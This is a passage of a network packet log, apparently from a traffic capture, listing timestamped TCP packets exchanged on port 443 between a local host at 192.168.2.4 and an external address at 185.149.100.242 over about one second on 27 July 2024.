Jul 27, 2024 08:54:11.761046886 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.761050940 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.761097908 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.810966015 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.811023951 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.811067104 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.811074972 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.811085939 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.811111927 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812385082 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812427044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812450886 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812455893 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812489986 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812503099 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812608957 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812648058 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812671900 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812678099 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.812712908 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.812731981 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.815932035 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.815985918 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.816018105 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.816024065 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.816061020 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.816068888 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.841645002 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.841715097 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.841929913 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.841978073 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.842097044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.843775988 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.843786001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.843877077 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.901249886 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.901309967 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.901350975 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.901356936 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.901405096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.902935028 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.904211044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904254913 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904309034 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.904313087 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904340982 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.904349089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.904640913 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904689074 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904706001 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.904711008 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.904756069 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.906801939 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.906848907 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.906874895 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.906879902 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.906909943 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.906918049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.932523012 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.932591915 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.932627916 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.932635069 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.932665110 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.932673931 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.932960987 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933001995 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933036089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933041096 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933068991 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933084011 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933254004 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933300018 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933331966 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933339119 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933370113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933376074 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933528900 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933573961 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933598995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933603048 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:11.933629990 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:11.933644056 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205039024 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205100060 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205135107 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205143929 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205171108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205192089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205267906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205312014 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205332994 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205338955 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205365896 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205379009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205471039 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205511093 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205534935 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205539942 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205594063 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205642939 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205683947 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205696106 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205710888 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205735922 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205755949 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205868006 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205913067 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205929041 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.205935001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.205971956 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206078053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206115007 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206136942 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206141949 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206176996 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206290960 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206334114 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206356049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206361055 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206382990 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206403017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206526041 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206562996 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206584930 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206589937 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206618071 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206634998 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206681013 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206722975 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206739902 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206746101 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206770897 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206785917 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206887960 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206927061 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206944942 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.206950903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.206980944 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207000017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207093000 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207130909 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207150936 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207155943 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207184076 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207201004 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207293034 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207333088 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207350969 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207356930 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207391977 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207448006 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207496881 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207537889 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207559109 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207564116 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207586050 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207604885 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207698107 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207736015 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207763910 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207768917 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.207792997 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207813025 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.207961082 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208003998 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208015919 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208025932 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208074093 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208180904 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208240032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208261013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208267927 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208291054 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208309889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208388090 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208430052 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208448887 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208453894 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208478928 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208494902 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208806038 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208849907 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208864927 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208872080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.208899975 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.208914042 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.213648081 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.213690042 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.213715076 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.213721037 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.213737011 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.213752031 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.213911057 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.213949919 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.213970900 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.213974953 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214003086 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214015007 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214272976 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214313984 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214339018 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214344025 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214363098 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214384079 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214529037 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214567900 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214587927 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214592934 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.214620113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.214628935 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215080976 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215121984 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215137005 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215141058 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215167046 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215183973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215230942 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215275049 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215282917 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215296030 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.215320110 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.215343952 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.223568916 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.265378952 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.265436888 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.265481949 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.265489101 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.265515089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.265531063 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.267047882 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.267097950 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.267124891 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.267128944 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.267155886 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.267172098 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.268465996 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.268528938 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.268532038 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.268560886 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.268587112 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.268599033 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.268634081 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.269903898 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.269953012 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.269979000 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.269983053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.270006895 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.270024061 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.276426077 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.298042059 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.298106909 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.298144102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.298150063 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.298186064 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299046040 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299093008 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299110889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299117088 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299138069 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299156904 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299246073 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299302101 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299340010 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299344063 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299372911 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299385071 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299566031 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299588919 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299614906 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299619913 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.299652100 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.299668074 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.356092930 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.356161118 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.356194973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.356200933 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.356229067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.356245995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.357795000 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.357837915 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.357872963 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.357877970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.357909918 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.357918978 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.359102964 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.359153986 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.359169960 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.359185934 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.359214067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.359221935 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.360882044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.360925913 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.360970974 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.360975027 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.360985994 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.361013889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.389184952 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.389246941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.389265060 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.389271975 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.389302969 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.389322996 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390508890 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390528917 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390578032 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390583038 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390610933 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390629053 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390824080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390849113 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390882969 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390887976 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.390918016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.390924931 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.391042948 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.391062021 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.391088009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.391093016 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.391119003 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.391129971 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.446858883 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.446918964 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.446938992 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.446945906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.446980000 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.446996927 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.448461056 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.448535919 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.448542118 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.448571920 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:12.448602915 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.448617935 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:12.449738979 CEST	443	50695	185.149.100.242	192.168.2.4
